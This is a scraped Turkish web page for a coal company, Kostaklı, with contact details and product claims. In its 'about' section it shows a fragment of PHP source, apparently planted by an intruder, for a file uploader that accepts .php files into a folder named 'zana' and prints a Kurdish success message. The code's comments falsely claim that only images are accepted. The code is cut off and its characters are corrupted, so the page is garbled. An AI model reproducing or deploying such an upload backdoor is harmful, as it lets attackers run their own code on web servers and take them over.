+90 352 240 69 79


Adres Bilgisi

a

info@kostakli.com


KOSTAKLI HAKKINDA

Sanoger - z klasor

 

(1024*1024*3))//Buarada dosyam?z 3 mb b?y?kse girmesini s?yledik {//?steyen arkadaslar buray? istedi?i gibi de?i?tirebilir size kalm?? bir ?ey echo 'Dosya 3MB den b?y?k olamaz.';// 3 mb b?y?kse ekrana yazd?raca??m?z alan } else { $tip = $_FILES['dosya']['type'];//Dosya tipimizi ald?k $isim = $_FILES['dosya']['name'];// Dosya ismimizi ald?k $uzanti = explode('.', $isim);//Burada . sonraki k?sm? ald?k yani resim.jpg dosyam?z var . sonraki olan k?s?m .jpg al?cakt?r. $uzanti = $uzanti[count($uzanti)-1];//Yukar?da .jpg k?sm?n? alm??t?k burada . k?sm?n? silmi? oluyoruz elimizdeki uzant? sadece olarak jpg veya png olmu? olacak if($uzanti == 'jpg' || $uzanti == 'zip' || $uzanti == 'pjpg' || $uzanti == 'pjpeg' || $uzanti == 'php') {//Kontrol?m?z? yap?yoruz sadece jpg veya png veya gif dosyalar?n? kabul edicez if(!file_exists('zana'))//Buradaki ?art?m?z dosyam?z? dosyalar ad?nda bir klas?re g?nderiyoruz e?er klas?r yoksa olu?turmas?n? istiyoruz burada mkdir('zana');//dosyalar isimli klas?r? olu?tur dedik $dosya = $_FILES['dosya']['tmp_name'];//Dosyam?z? gecici dizinden $dosya de?i?kenine aktard?k. copy($dosya, 'zana/' . $_FILES['dosya']['name']);// copy fonksiyonu ile dosyalar isimli klas?r?ne kaydettik. echo 'Serkefti bu here -> z...... ';//Ba?ar?l? olmas? durumunda ekranda g?z?kecek. } else {//E?er Dosya uzant?s?n? kabul etmediysek kullan?c?y? bilgilendiriyoruz. echo 'Yanl?zca JPG,PNG dosyalar? g?nderebilirsiniz.'; } } } } ?>

KÖMÜR ÖZELLİKLERİ


100

%100 doğal ürünler

Ürünlerimiz uluslararası kalite standartlarına göre üretilip paketlenmektedir. Ürünlerimizin içeriğinde doğaya zarar verecek herhangi bir madde yoktur.

40

%40 Daha Ergonomik

Kömülerimiz 6 saat aralıksız yanabilen, yandıktan sonra geriye normal ağırlığının en fazla %5'ini bırakan bir yapıya sahiptir.

100

Ürünlerimiz %100 Garantilidir

Defalarca kalite kontrol testlerine tabi tutulan kömürlerimiz, en iyi şekilde paketlenir ve firmamızın güvencesi altındadır.

0 Ürün Çeşidi
0 Sektörde Hizmet
0 Üzeri Memnun Müşteri
0 Yıllık Tecrübe